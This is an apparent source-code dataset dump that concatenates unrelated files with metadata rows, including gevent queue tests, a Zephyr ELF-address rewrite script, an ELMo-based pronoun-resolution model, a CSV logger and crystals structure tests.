all_extensions = dicts.add(_required_extensions, EXTENSIONS)
# These extensions can be removed on a site specific basis.
return [v for k, v in all_extensions.items() if not k in denylist]
# Core extensions needed to run Envoy's integration tests.
_core_extensions = [
"envoy.access_loggers.file",
"envoy.filters.http.router",
"envoy.filters.http.health_check",
"envoy.filters.network.http_connection_manager",
"envoy.stat_sinks.statsd",
"envoy.transport_sockets.raw_buffer",
]
# Return all core extensions to be compiled into Envoy.
def envoy_all_core_extensions():
all_extensions = dicts.add(_required_extensions, EXTENSIONS)
# These extensions can be removed on a site specific basis.
return [v for k, v in all_extensions.items() if k in _core_extensions]
_http_filter_prefix = "envoy.filters.http"
def envoy_all_http_filters():
all_extensions = dicts.add(_required_extensions, EXTENSIONS)
return [v for k, v in all_extensions.items() if k.startswith(_http_filter_prefix)]
# All network-layer filters are extensions with names that have the following prefix.
_network_filter_prefix = "envoy.filters.network"
# Return all network-layer filter extensions to be compiled into network-layer filter generic fuzzer.
def envoy_all_network_filters():
all_extensions = dicts.add(_required_extensions, EXTENSIONS)
return [v for k, v in all_extensions.items() if k.startswith(_network_filter_prefix)]
| 41.18 | 103 | 0.770277 |
ace733ac0641e68557888ec4e327c1fb25e6b28b | 12,107 | py | Python | greentest/test_queue.py | newbrough/gevent-0.13.7 | 5c4ebef04f280e4ee1501a6e697e3b4681b1568d | [
"BSD-3-Clause",
"MIT"
] | 1 | 2021-03-08T14:08:52.000Z | 2021-03-08T14:08:52.000Z | greentest/test_queue.py | newbrough/gevent-0.13.7 | 5c4ebef04f280e4ee1501a6e697e3b4681b1568d | [
"BSD-3-Clause",
"MIT"
] | null | null | null | greentest/test_queue.py | newbrough/gevent-0.13.7 | 5c4ebef04f280e4ee1501a6e697e3b4681b1568d | [
"BSD-3-Clause",
"MIT"
] | null | null | null | # Some simple queue module tests, plus some failure conditions
# to ensure the Queue locks remain stable.
#from __future__ import with_statement
from gevent import monkey; monkey.patch_all()
from gevent import queue as Queue
import threading
import time
import unittest
import test_support
QUEUE_SIZE = 5
# A thread to run a function that unclogs a blocked Queue.
class _TriggerThread(threading.Thread):
def __init__(self, fn, args):
self.fn = fn
self.args = args
#self.startedEvent = threading.Event()
from gevent.event import Event
self.startedEvent = Event()
threading.Thread.__init__(self)
def run(self):
# The sleep isn't necessary, but is intended to give the blocking
# function in the main thread a chance at actually blocking before
# we unclog it. But if the sleep is longer than the timeout-based
# tests wait in their blocking functions, those tests will fail.
# So we give them much longer timeout values compared to the
# sleep here (I aimed at 10 seconds for blocking functions --
# they should never actually wait that long - they should make
# progress as soon as we call self.fn()).
time.sleep(0.01)
self.startedEvent.set()
self.fn(*self.args)
# Execute a function that blocks, and in a separate thread, a function that
# triggers the release. Returns the result of the blocking function. Caution:
# block_func must guarantee to block until trigger_func is called, and
# trigger_func must guarantee to change queue state so that block_func can make
# enough progress to return. In particular, a block_func that just raises an
# exception regardless of whether trigger_func is called will lead to
# timing-dependent sporadic failures, and one of those went rarely seen but
# undiagnosed for years. Now block_func must be unexceptional. If block_func
# is supposed to raise an exception, call do_exceptional_blocking_test()
# instead.
class BlockingTestMixin:
def do_blocking_test(self, block_func, block_args, trigger_func, trigger_args):
self.t = _TriggerThread(trigger_func, trigger_args)
self.t.start()
self.result = block_func(*block_args)
# If block_func returned before our thread made the call, we failed!
if not self.t.startedEvent.isSet():
self.fail("blocking function '%r' appeared not to block" %
block_func)
self.t.join(10) # make sure the thread terminates
if self.t.isAlive():
self.fail("trigger function '%r' appeared to not return" %
trigger_func)
return self.result
# Call this instead if block_func is supposed to raise an exception.
def do_exceptional_blocking_test(self,block_func, block_args, trigger_func,
trigger_args, expected_exception_class):
self.t = _TriggerThread(trigger_func, trigger_args)
self.t.start()
try:
try:
block_func(*block_args)
except expected_exception_class:
raise
else:
self.fail("expected exception of kind %r" %
expected_exception_class)
finally:
self.t.join(10) # make sure the thread terminates
if self.t.isAlive():
self.fail("trigger function '%r' appeared to not return" %
trigger_func)
if not self.t.startedEvent.isSet():
self.fail("trigger thread ended but event never set")
class BaseQueueTest(unittest.TestCase, BlockingTestMixin):
def setUp(self):
self.cum = 0
self.cumlock = threading.Lock()
def simple_queue_test(self, q):
if not q.empty():
raise RuntimeError, "Call this function with an empty queue"
# I guess we better check things actually queue correctly a little :)
q.put(111)
q.put(333)
q.put(222)
target_order = dict(Queue = [111, 333, 222],
LifoQueue = [222, 333, 111],
PriorityQueue = [111, 222, 333])
actual_order = [q.get(), q.get(), q.get()]
self.assertEquals(actual_order, target_order[q.__class__.__name__],
"Didn't seem to queue the correct data!")
for i in range(QUEUE_SIZE-1):
q.put(i)
self.assert_(not q.empty(), "Queue should not be empty")
self.assert_(not q.full(), "Queue should not be full")
q.put("last")
self.assert_(q.full(), "Queue should be full")
try:
q.put("full", block=0)
self.fail("Didn't appear to block with a full queue")
except Queue.Full:
pass
try:
q.put("full", timeout=0.01)
self.fail("Didn't appear to time-out with a full queue")
except Queue.Full:
pass
self.assertEquals(q.qsize(), QUEUE_SIZE)
# Test a blocking put
self.do_blocking_test(q.put, ("full",), q.get, ())
self.do_blocking_test(q.put, ("full", True, 10), q.get, ())
# Empty it
for i in range(QUEUE_SIZE):
q.get()
self.assert_(q.empty(), "Queue should be empty")
try:
q.get(block=0)
self.fail("Didn't appear to block with an empty queue")
except Queue.Empty:
pass
try:
q.get(timeout=0.01)
self.fail("Didn't appear to time-out with an empty queue")
except Queue.Empty:
pass
# Test a blocking get
self.do_blocking_test(q.get, (), q.put, ('empty',))
self.do_blocking_test(q.get, (True, 10), q.put, ('empty',))
def worker(self, q):
while True:
x = q.get()
if x is None:
q.task_done()
return
#with self.cumlock:
self.cum += x
q.task_done()
def queue_join_test(self, q):
self.cum = 0
for i in (0,1):
threading.Thread(target=self.worker, args=(q,)).start()
for i in xrange(100):
q.put(i)
q.join()
self.assertEquals(self.cum, sum(range(100)),
"q.join() did not block until all tasks were done")
for i in (0,1):
q.put(None) # instruct the threads to close
q.join() # verify that you can join twice
def test_queue_task_done(self):
# Test to make sure a queue task completed successfully.
q = Queue.JoinableQueue() # self.type2test()
# XXX the same test in subclasses
try:
q.task_done()
except ValueError:
pass
else:
self.fail("Did not detect task count going negative")
def test_queue_join(self):
# Test that a queue join()s successfully, and before anything else
# (done twice for insurance).
q = Queue.JoinableQueue() # self.type2test()
# XXX the same test in subclass
self.queue_join_test(q)
self.queue_join_test(q)
try:
q.task_done()
except ValueError:
pass
else:
self.fail("Did not detect task count going negative")
def test_simple_queue(self):
# Do it a couple of times on the same queue.
# Done twice to make sure works with same instance reused.
q = self.type2test(QUEUE_SIZE)
self.simple_queue_test(q)
self.simple_queue_test(q)
class QueueTest(BaseQueueTest):
type2test = Queue.Queue
class LifoQueueTest(BaseQueueTest):
type2test = Queue.LifoQueue
class PriorityQueueTest(BaseQueueTest):
type2test = Queue.PriorityQueue
# A Queue subclass that can provoke failure at a moment's notice :)
class FailingQueueException(Exception):
pass
class FailingQueue(Queue.Queue):
def __init__(self, *args):
self.fail_next_put = False
self.fail_next_get = False
Queue.Queue.__init__(self, *args)
def _put(self, item):
if self.fail_next_put:
self.fail_next_put = False
raise FailingQueueException, "You Lose"
return Queue.Queue._put(self, item)
def _get(self):
if self.fail_next_get:
self.fail_next_get = False
raise FailingQueueException, "You Lose"
return Queue.Queue._get(self)
class FailingQueueTest(unittest.TestCase, BlockingTestMixin):
def failing_queue_test(self, q):
if not q.empty():
raise RuntimeError, "Call this function with an empty queue"
for i in range(QUEUE_SIZE-1):
q.put(i)
# Test a failing non-blocking put.
q.fail_next_put = True
try:
q.put("oops", block=0)
self.fail("The queue didn't fail when it should have")
except FailingQueueException:
pass
q.fail_next_put = True
try:
q.put("oops", timeout=0.1)
self.fail("The queue didn't fail when it should have")
except FailingQueueException:
pass
q.put("last")
self.assert_(q.full(), "Queue should be full")
# Test a failing blocking put
q.fail_next_put = True
try:
self.do_blocking_test(q.put, ("full",), q.get, ())
self.fail("The queue didn't fail when it should have")
except FailingQueueException:
pass
# Check the Queue isn't damaged.
# put failed, but get succeeded - re-add
q.put("last")
# Test a failing timeout put
q.fail_next_put = True
try:
self.do_exceptional_blocking_test(q.put, ("full", True, 10), q.get, (),
FailingQueueException)
self.fail("The queue didn't fail when it should have")
except FailingQueueException:
pass
# Check the Queue isn't damaged.
# put failed, but get succeeded - re-add
q.put("last")
self.assert_(q.full(), "Queue should be full")
q.get()
self.assert_(not q.full(), "Queue should not be full")
q.put("last")
self.assert_(q.full(), "Queue should be full")
# Test a blocking put
self.do_blocking_test(q.put, ("full",), q.get, ())
# Empty it
for i in range(QUEUE_SIZE):
q.get()
self.assert_(q.empty(), "Queue should be empty")
q.put("first")
q.fail_next_get = True
try:
q.get()
self.fail("The queue didn't fail when it should have")
except FailingQueueException:
pass
self.assert_(not q.empty(), "Queue should not be empty")
q.fail_next_get = True
try:
q.get(timeout=0.1)
self.fail("The queue didn't fail when it should have")
except FailingQueueException:
pass
self.assert_(not q.empty(), "Queue should not be empty")
q.get()
self.assert_(q.empty(), "Queue should be empty")
q.fail_next_get = True
try:
self.do_exceptional_blocking_test(q.get, (), q.put, ('empty',),
FailingQueueException)
self.fail("The queue didn't fail when it should have")
except FailingQueueException:
pass
# put succeeded, but get failed.
self.assert_(not q.empty(), "Queue should not be empty")
q.get()
self.assert_(q.empty(), "Queue should be empty")
def test_failing_queue(self):
# Test to make sure a queue is functioning correctly.
# Done twice to the same instance.
q = FailingQueue(QUEUE_SIZE)
self.failing_queue_test(q)
self.failing_queue_test(q)
def test_main():
test_support.run_unittest(QueueTest, LifoQueueTest, PriorityQueueTest,
FailingQueueTest)
if __name__ == "__main__":
test_main()
| 37.024465 | 83 | 0.592137 |
ace734e3b3f465e53b882541c747e64f4be1d45a | 430 | py | Python | venv/Scripts/fitsinfo-script.py | temelkirci/Motion_Editor | a8b8d4c4d2dcc9be28385600f56066cef92a38ad | [
"MIT"
] | 1 | 2022-03-02T17:07:20.000Z | 2022-03-02T17:07:20.000Z | venv/Scripts/fitsinfo-script.py | temelkirci/RealTime_6DOF_Motion_Editor | a8b8d4c4d2dcc9be28385600f56066cef92a38ad | [
"MIT"
] | null | null | null | venv/Scripts/fitsinfo-script.py | temelkirci/RealTime_6DOF_Motion_Editor | a8b8d4c4d2dcc9be28385600f56066cef92a38ad | [
"MIT"
] | null | null | null | #!C:\Users\DOF\Desktop\DOF_Motion_Editor\venv\Scripts\python.exe
# EASY-INSTALL-ENTRY-SCRIPT: 'astropy==3.0.5','console_scripts','fitsinfo'
__requires__ = 'astropy==3.0.5'
import re
import sys
from pkg_resources import load_entry_point
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(
load_entry_point('astropy==3.0.5', 'console_scripts', 'fitsinfo')()
)
| 33.076923 | 75 | 0.683721 |
ace735b8aabcf70d15529f71e3b6f58bb8f372a0 | 5,469 | py | Python | boards/x86/qemu_x86/scripts/update_elf_load_addr.py | tomaszkob89/sdk-zephyr | a9423cbce69a5df78140a2cf3ba11aa56d395cfc | [
"Apache-2.0"
] | 1 | 2020-03-12T13:18:08.000Z | 2020-03-12T13:18:08.000Z | boards/x86/qemu_x86/scripts/update_elf_load_addr.py | tomaszkob89/sdk-zephyr | a9423cbce69a5df78140a2cf3ba11aa56d395cfc | [
"Apache-2.0"
] | 4 | 2022-03-10T10:11:21.000Z | 2022-03-21T11:41:17.000Z | boards/x86/qemu_x86/scripts/update_elf_load_addr.py | tomaszkob89/sdk-zephyr | a9423cbce69a5df78140a2cf3ba11aa56d395cfc | [
"Apache-2.0"
] | 4 | 2019-11-26T16:15:55.000Z | 2022-01-19T08:47:50.000Z | #!/usr/bin/env python3
#
# Copyright (c) 2021 Intel Corporation
#
# SPDX-License-Identifier: Apache-2.0
"""Update ELF Load Address
This updates the entry and physical load addresses in ELF file
so that QEMU is able to load and run the Zephyr kernel even
though the kernel is linked in virtual address space.
When the Zephyr kernel is linked in virtual address space,
the ELF file only contains virtual addresses which may result
in QEMU loading code and data into non-existent physical memory
if both physical and virtual address space do not start at
the same address. This script modifies the physical addresses
of the load segments so QEMU will place code and data in
physical memory. This also updates the entry address to physical
address so QEMU can jump to it to start the Zephyr kernel.
"""
import argparse
import os
import sys
import struct
from ctypes import create_string_buffer
from elftools.elf.elffile import ELFFile
from elftools.elf.sections import SymbolTableSection
# ELF Header, load entry offset
ELF_HDR_ENTRY_OFFSET = 0x18
def log(text):
"""Output log text if --verbose is used"""
if args.verbose:
sys.stdout.write(os.path.basename(sys.argv[0]) + ": " + text + "\n")
def error(text):
"""Output error message"""
sys.exit(os.path.basename(sys.argv[0]) + ": " + text)
def extract_all_symbols_from_elf(obj):
"""Get all symbols from the ELF file"""
all_syms = {}
for section in obj.iter_sections():
if isinstance(section, SymbolTableSection):
for sym in section.iter_symbols():
all_syms[sym.name] = sym.entry.st_value
if len(all_syms) == 0:
raise LookupError("Could not find symbol table")
return all_syms
def parse_args():
"""Parse command line arguments"""
global args
parser = argparse.ArgumentParser()
parser.add_argument("-k", "--kernel", required=True,
help="Zephyr ELF binary")
parser.add_argument("-o", "--output", required=True,
help="Output path")
parser.add_argument("-v", "--verbose", action="store_true",
help="Print extra debugging information")
args = parser.parse_args()
def main():
"""Main function"""
global args
parse_args()
if not os.path.exists(args.kernel):
error("{0} does not exist.".format(args.kernel))
elf_fd = open(args.kernel, "rb")
# Create a modifiable byte stream
raw_elf = elf_fd.read()
output = create_string_buffer(raw_elf)
elf = ELFFile(elf_fd)
if not elf.has_dwarf_info():
error("ELF file has no DWARF information")
if elf.num_segments() == 0:
error("ELF file has no program header table")
syms = extract_all_symbols_from_elf(elf)
vm_base = syms["CONFIG_KERNEL_VM_BASE"]
vm_size = syms["CONFIG_KERNEL_VM_SIZE"]
sram_base = syms["CONFIG_SRAM_BASE_ADDRESS"]
sram_size = syms["CONFIG_SRAM_SIZE"] * 1024
vm_offset = syms["CONFIG_KERNEL_VM_OFFSET"]
sram_offset = syms.get("CONFIG_SRAM_OFFSET", 0)
#
# Calculate virtual-to-physical address translation
#
virt_to_phys_offset = (sram_base + sram_offset) - (vm_base + vm_offset)
log("Virtual address space: 0x%x - 0x%x size 0x%x (offset 0x%x)" %
(vm_base, vm_base + vm_size, vm_size, vm_offset))
log("Physical address space: 0x%x - 0x%x size 0x%x (offset 0x%x)" %
(sram_base, sram_base + sram_size, sram_size, sram_offset))
#
# Update the entry address in header
#
if elf.elfclass == 32:
load_entry_type = "I"
else:
load_entry_type = "Q"
entry_virt = struct.unpack_from(load_entry_type, output, ELF_HDR_ENTRY_OFFSET)[0]
entry_phys = entry_virt + virt_to_phys_offset
struct.pack_into(load_entry_type, output, ELF_HDR_ENTRY_OFFSET, entry_phys)
log("Entry Address: 0x%x -> 0x%x" % (entry_virt, entry_phys))
#
# Update load address in program header segments
#
# Program header segment offset from beginning of file
ph_off = elf.header['e_phoff']
# ph_seg_type: segment type and other fields before virtual address
# ph_seg_addr: virtual and phyiscal addresses
# ph_seg_whole: whole segment
if elf.elfclass == 32:
ph_seg_type = "II"
ph_seg_addr = "II"
ph_seg_whole = "IIIIIIII"
else:
ph_seg_type = "IIQ"
ph_seg_addr = "QQ"
ph_seg_whole = "IIQQQQQQ"
# Go through all segments
for ph_idx in range(elf.num_segments()):
seg_off = ph_off + struct.calcsize(ph_seg_whole) * ph_idx
seg_type, _ = struct.unpack_from(ph_seg_type, output, seg_off)
# Only process LOAD segments
if seg_type != 0x01:
continue
# Add offset to get to the addresses
addr_off = seg_off + struct.calcsize(ph_seg_type)
# Grab virtual and physical addresses
seg_vaddr, seg_paddr = struct.unpack_from(ph_seg_addr, output, addr_off)
# Apply virt-to-phys offset so it will load into
# physical address
seg_paddr_new = seg_vaddr + virt_to_phys_offset
log("Segment %d: physical address 0x%x -> 0x%x" % (ph_idx, seg_paddr, seg_paddr_new))
# Put the addresses back
struct.pack_into(ph_seg_addr, output, addr_off, seg_vaddr, seg_paddr_new)
out_fd = open(args.output, "wb")
out_fd.write(output)
out_fd.close()
elf_fd.close()
if __name__ == "__main__":
main()
| 29.403226 | 93 | 0.671786 |
ace735ebf161b118ef3d6642d5fc963af3d198d5 | 112 | py | Python | tests/integration/docusaurus/template/script_example.py | victorcouste/great_expectations | 9ee46d83feb87e13c769e2ae35b899b3f18d73a4 | [
"Apache-2.0"
] | 6,451 | 2017-09-11T16:32:53.000Z | 2022-03-31T23:27:49.000Z | tests/integration/docusaurus/template/script_example.py | victorcouste/great_expectations | 9ee46d83feb87e13c769e2ae35b899b3f18d73a4 | [
"Apache-2.0"
] | 3,892 | 2017-09-08T18:57:50.000Z | 2022-03-31T23:15:20.000Z | tests/integration/docusaurus/template/script_example.py | victorcouste/great_expectations | 9ee46d83feb87e13c769e2ae35b899b3f18d73a4 | [
"Apache-2.0"
] | 1,023 | 2017-09-08T15:22:05.000Z | 2022-03-31T21:17:08.000Z | import os
from ruamel import yaml
import great_expectations as ge
context = ge.get_context()
assert context
| 11.2 | 31 | 0.794643 |
ace7368b03bb987aca6bcdbbc047dfc01a45f300 | 8,317 | py | Python | frozen_model/scripts/elmo_mlp_model.py | Yorko/gender-unbiased_BERT-based_pronoun_resolution | 67d8c6b3fce94bbeb75bbc644a3111b168e7c25b | [
"Apache-2.0"
] | 47 | 2019-05-21T06:30:36.000Z | 2022-02-18T08:35:13.000Z | frozen_model/scripts/elmo_mlp_model.py | Yorko/gender-unbiased_BERT-based_pronoun_resolution | 67d8c6b3fce94bbeb75bbc644a3111b168e7c25b | [
"Apache-2.0"
] | 1 | 2022-01-12T17:40:19.000Z | 2022-01-13T10:50:17.000Z | frozen_model/scripts/elmo_mlp_model.py | Yorko/gender-unbiased_BERT-based_pronoun_resolution | 67d8c6b3fce94bbeb75bbc644a3111b168e7c25b | [
"Apache-2.0"
] | 6 | 2019-08-12T16:10:52.000Z | 2021-11-15T08:44:31.000Z | '''
Before running, download the files:
"https://s3-us-west-2.amazonaws.com/allennlp/models/elmo/2x4096_512_2048cnn_2xhighway/elmo_2x4096_512_2048cnn_2xhighway_options.json"
"https://s3-us-west-2.amazonaws.com/allennlp/models/elmo/2x4096_512_2048cnn_2xhighway/elmo_2x4096_512_2048cnn_2xhighway_weights.hdf5"
and place them in the folder:
../models/elmo
Requires 2.0.11 <= spacy <= 2.0.18
I ran into an issue using allennlp 0.8.3:
conflict caused by a folder and a file with
the same name "wikitable", located in
.local/lib/python3.6/site-packages/allennlp/data/dataset_readers/semantic_parsing
Tried different versions of allennlp, which created other problems.
To solve the conflict, I kept allennlp 0.8.3 and manually changed the name of the folder.
Let me know if you find a better solution.
To run ELMo on GPU, add parameter cuda_device = 0 to ElmoEmbedder
'''
import numpy as np, pandas as pd
import os
import zipfile
import sys
import time
import pickle
from allennlp.commands.elmo import ElmoEmbedder
from allennlp.data.tokenizers import word_tokenizer
from sklearn.model_selection import cross_val_score, KFold, train_test_split
from sklearn.metrics import log_loss
from keras import backend, models, layers, initializers, regularizers, constraints, optimizers
from keras import callbacks as kc
from keras import optimizers as ko
INPUT_PATH = "input/"
FEATURE_PATH = "features/"
MODEL_PATH = "models/elmo/"
TRAIN_FILE_PATH = INPUT_PATH + "train.tsv"
TEST_FILE_PATH = INPUT_PATH + "test.tsv" # modify this path for stage 2
dense_layer_sizes = [37]
dropout_rate = 0.6
learning_rate = 0.001
n_fold = 5
batch_size = 32
epochs = 1000
patience = 100
lambd = 0.1 # L2 regularization
def get_elmo_fea(data, op, wg):
'''
Took this method from public kernel:
https://www.kaggle.com/wochidadonggua/elmo-baseline
modified it to concatenate all 3 layers
'''
def get_nearest(slot, target):
for i in range(target, -1, -1):
if i in slot:
return i
# add parameter cuda_device=0 to use GPU
elmo = ElmoEmbedder(options_file=op, weight_file=wg)
tk = word_tokenizer.WordTokenizer()
tokens = tk.batch_tokenize(data.Text)
idx = []
for i in range(len(tokens)):
idx.append([x.idx for x in tokens[i]])
tokens[i] = [x.text for x in tokens[i]]
vectors = elmo.embed_sentences(tokens)
ans = []
for i, vector in enumerate([v for v in vectors]):
P_l = data.iloc[i].Pronoun
A_l = data.iloc[i].A.split()
B_l = data.iloc[i].B.split()
P_offset = data.iloc[i]['Pronoun-offset']
A_offset = data.iloc[i]['A-offset']
B_offset = data.iloc[i]['B-offset']
if P_offset not in idx[i]:
P_offset = get_nearest(idx[i], P_offset)
if A_offset not in idx[i]:
A_offset = get_nearest(idx[i], A_offset)
if B_offset not in idx[i]:
B_offset = get_nearest(idx[i], B_offset)
# P is a single token. For A and B, average over tokens in the span.
emb_P = vector[:, idx[i].index(P_offset), :]
emb_A = np.mean(vector[:, idx[i].index(A_offset):idx[i].index(A_offset) + len(A_l), :], axis=1)
emb_B = np.mean(vector[:, idx[i].index(B_offset):idx[i].index(B_offset) + len(B_l), :], axis=1)
ans.append(np.concatenate([emb_A[0], emb_A[1], emb_A[2], emb_B[0], emb_B[1], emb_B[2],
emb_P[0], emb_P[1], emb_P[2]], axis=0).reshape(1, -1))
emb = np.concatenate(ans, axis=0)
return emb
def build_mlp_model(input_shape, seed):
X_input = layers.Input(input_shape)
# First dense layer
X = layers.Dense(dense_layer_sizes[0], name='dense0', kernel_initializer=initializers.glorot_uniform(seed=seed))(
X_input)
X = layers.BatchNormalization(name='bn0')(X)
X = layers.Activation('relu')(X)
X = layers.Dropout(dropout_rate, seed=seed)(X)
# Second dense layer
# X = layers.Dense(dense_layer_sizes[0], name = 'dense1', kernel_initializer=initializers.glorot_uniform(seed=seed))(X)
# X = layers.BatchNormalization(name = 'bn1')(X)
# X = layers.Activation('relu')(X)
# X = layers.Dropout(dropout_rate, seed = seed)(X)
# Output layer
X = layers.Dense(3, name='output', kernel_regularizer=regularizers.l2(lambd),
kernel_initializer=initializers.glorot_uniform(seed=seed))(X)
X = layers.Activation('softmax')(X)
# Create model
model = models.Model(input=X_input, output=X, name="classif_model")
return model
def build_elmo_embeddings():
op = MODEL_PATH + "elmo_2x4096_512_2048cnn_2xhighway_options.json"
wg = MODEL_PATH + "elmo_2x4096_512_2048cnn_2xhighway_weights.hdf5"
print("Started at ", time.ctime())
test_data = pd.read_csv(TEST_FILE_PATH, sep='\t')
X_test = get_elmo_fea(test_data, op, wg)
train_data = pd.read_csv(TRAIN_FILE_PATH, sep='\t')
X_train = get_elmo_fea(train_data, op, wg)
print("Finished at ", time.ctime())
elmo_train = pd.DataFrame(X_train)
elmo_test = pd.DataFrame(X_test)
elmo_train.to_csv(FEATURE_PATH + "train_elmo_embedding.csv", index=False)
elmo_test.to_csv(FEATURE_PATH + "test_elmo_embedding.csv", index=False)
def get_labels_for_elmo():
train = pd.read_csv(TRAIN_FILE_PATH, sep='\t')
Y_train = np.zeros((len(train), 3))
for i in range(len(train)):
if train.loc[i, "A-coref"]:
Y_train[i, 0] = 1
elif train.loc[i, "B-coref"]:
Y_train[i, 1] = 1
else:
Y_train[i, 2] = 1
return Y_train
def train_elmo_mlp_model(test=False):
'''
Runs 5-fold CV and blending over 3 seed values
Simple MLP architecture: 1 hidden layer seems to work better than 2
'''
# Read the embeddings from file
X_train = pd.read_csv(FEATURE_PATH + "train_elmo_embedding.csv").values
X_test = pd.read_csv(FEATURE_PATH + "test_elmo_embedding.csv").values
# Get the labels to train the MLP model
Y_train = get_labels_for_elmo()
# Initializing the predictions
prediction = np.zeros((len(X_test), 3))
oof = np.zeros((len(X_train), 3))
# Training and cross-validation
scores = []
seed_list = [1, 6003, 10000007]
for seed in seed_list:
folds = KFold(n_splits=n_fold, shuffle=True, random_state=seed)
for fold_n, (train_index, valid_index) in enumerate(folds.split(X_train)):
# split training and validation data
print('Fold', fold_n, 'started at', time.ctime())
X_tr, X_val = X_train[train_index], X_train[valid_index]
Y_tr, Y_val = Y_train[train_index], Y_train[valid_index]
# Define the model, re-initializing for each fold
classif_model = build_mlp_model([X_train.shape[1]], seed)
classif_model.compile(optimizer=optimizers.Adam(lr=learning_rate),
loss="categorical_crossentropy")
callbacks = [kc.EarlyStopping(monitor='val_loss', patience=patience,
restore_best_weights=True)]
# train the model
classif_model.fit(x=X_tr, y=Y_tr, epochs=epochs, batch_size=batch_size,
callbacks=callbacks, validation_data=(X_val, Y_val), verbose=0)
# make predictions on validation and test data
pred_valid = classif_model.predict(x=X_val, verbose=0)
pred = classif_model.predict(x=X_test, verbose=0)
scores.append(log_loss(Y_val, pred_valid))
prediction += pred
oof[valid_index] += pred_valid
prediction /= n_fold * len(seed_list)
oof /= len(seed_list)
# Print CV scores, as well as score on the test data
print('CV mean score: {0:.4f}, std: {1:.4f}.'.format(np.mean(scores), np.std(scores)))
print(scores)
# print("Test score:", log_loss(Y_test,prediction))
df_pred = pd.DataFrame(prediction, columns=["elmo_A", "elmo_B", "elmo_N"]).round(4)
df_oof = pd.DataFrame(oof, columns=["elmo_A", "elmo_B", "elmo_N"]).round(4)
df_oof.to_csv(FEATURE_PATH + "train_elmo_prob.tsv", sep='\t')
df_pred.to_csv(FEATURE_PATH + "test_elmo_prob.tsv", sep='\t')
def build_train_elmo():
build_elmo_embeddings()
train_elmo_mlp_model()
| 34.945378 | 133 | 0.665144 |
ace73748db208666a98e75b2e930971dd982528e | 443 | py | Python | tests/test_case.py | blackacornlabs/marshmallow_extended | 0cda702d65c850044ff58f00f4eb29d2969077d0 | [
"MIT"
] | null | null | null | tests/test_case.py | blackacornlabs/marshmallow_extended | 0cda702d65c850044ff58f00f4eb29d2969077d0 | [
"MIT"
] | null | null | null | tests/test_case.py | blackacornlabs/marshmallow_extended | 0cda702d65c850044ff58f00f4eb29d2969077d0 | [
"MIT"
] | null | null | null | from os import getenv
from unittest import TestCase
from dotenv import load_dotenv
from mongoengine import connect
load_dotenv()
class CommonTestCase(TestCase):
db = None
@classmethod
def setUpClass(cls) -> None:
cls.db = connect(host=getenv("MONGODB_HOST"))
if 'test' in cls.db.list_database_names():
cls.db.drop_database('test')
@classmethod
def tearDownClass(cls) -> None:
pass
| 20.136364 | 53 | 0.677201 |
ace7374a61f09cc58d42b8c646349b58e0b14821 | 771 | py | Python | pystrand/loggers/csv_logger.py | jpodivin/pystrand | b707892c188379c64694f67a5c3e01e52c4618f7 | [
"BSD-3-Clause"
] | null | null | null | pystrand/loggers/csv_logger.py | jpodivin/pystrand | b707892c188379c64694f67a5c3e01e52c4618f7 | [
"BSD-3-Clause"
] | 2 | 2021-03-14T13:57:06.000Z | 2021-12-28T16:53:02.000Z | pystrand/loggers/csv_logger.py | jpodivin/pystrand | b707892c188379c64694f67a5c3e01e52c4618f7 | [
"BSD-3-Clause"
] | null | null | null | import os
import pandas as pd
from pystrand.loggers.base import BaseLogger
class CsvLogger(BaseLogger):
"""Uses pandas Dataframe to process history
and store it as a csv.
"""
def save_history(self, data, run_id):
"""Save run history as csv file with name consisting of prefix
set during the __init__ call and a id hash of the data object.
Raises PermissionError if denied access.
"""
log_file_name = "{0}_{1}.log".format(
self.log_file_name,
run_id)
path_to_file = os.path.join(self.log_path, log_file_name)
log = pd.DataFrame(data=data)
try:
log.to_csv(path_or_buf=path_to_file)
except PermissionError:
raise PermissionError()
| 26.586207 | 70 | 0.639429 |
ace737aff158fe92da4e3b29bf728baa644fcae9 | 8,403 | py | Python | tests/test_base.py | priyankism/crystals | 683bf35fbc95d0ded8cafdad0f2dede7adf5b072 | [
"BSD-3-Clause"
] | null | null | null | tests/test_base.py | priyankism/crystals | 683bf35fbc95d0ded8cafdad0f2dede7adf5b072 | [
"BSD-3-Clause"
] | null | null | null | tests/test_base.py | priyankism/crystals | 683bf35fbc95d0ded8cafdad0f2dede7adf5b072 | [
"BSD-3-Clause"
] | null | null | null | # -*- coding: utf-8 -*-
import collections.abc as abc
import pickle
import unittest
from copy import deepcopy
from itertools import islice
import numpy as np
from crystals import Atom, AtomicStructure, Crystal
np.random.seed(23)
class TestAtomicStructure(unittest.TestCase):
def setUp(self):
self.substructure = AtomicStructure(atoms=[Atom("U", [0, 0, 0])])
self.structure = AtomicStructure(
atoms=[Atom("Ag", [0, 0, 0]), Atom("Ag", [1, 1, 1])],
substructures=[self.substructure],
)
def test_iteration(self):
""" Test iteration of AtomicStructure yields from orphan atoms and substructure atoms alike """
elements = [atm.element for atm in self.structure]
self.assertTrue(len(elements), 3)
def test_addition_trivial(self):
""" Test that the addition of two AtomicStructures, one being empty, works as expected """
addition = self.structure + AtomicStructure()
self.assertEqual(addition, self.structure)
self.assertIsNot(addition, self.structure)
def test_addition_uniqueness(self):
""" Test that the addition of two AtomicStructures, works as expected regarding unique atoms """
self.assertEqual(self.structure + self.structure, self.structure)
def test_addition(self):
""" Test the addition of two different AtomicStructures works as expected. """
new_struct = AtomicStructure(
atoms=[Atom("U", [0, 1, 0])],
substructures=[
AtomicStructure(
atoms=[Atom("Ag", [0.5, 0, 0]), Atom("Ag", [1, 0.3, 1])]
)
],
)
addition = self.structure + new_struct
self.assertEqual(len(new_struct) + len(self.structure), len(addition))
self.assertEqual(
len(new_struct.atoms) + len(self.structure.atoms), len(addition.atoms)
)
self.assertEqual(
len(new_struct.substructures) + len(self.structure.substructures),
len(addition.substructures),
)
def test_addition_subclasses(self):
""" Test that the addition of two subclass of AtomicStructures is preserved under addition. """
class NewAtomicStructure(AtomicStructure):
pass
addition = NewAtomicStructure() + NewAtomicStructure()
self.assertIs(type(addition), NewAtomicStructure)
def test_truthiness(self):
""" Test that empty AtomicStructures are falsey, and truthy otherwise. """
empty_structure = AtomicStructure()
self.assertFalse(empty_structure)
self.assertTrue(self.structure)
def test_trivial_transformation(self):
""" Test that the identity transformation of an AtomicStructure works as expected. """
transformed = self.structure.transform(np.eye(3))
# transformed structure should be different, but equal, to original structure
self.assertIsNot(transformed, self.structure)
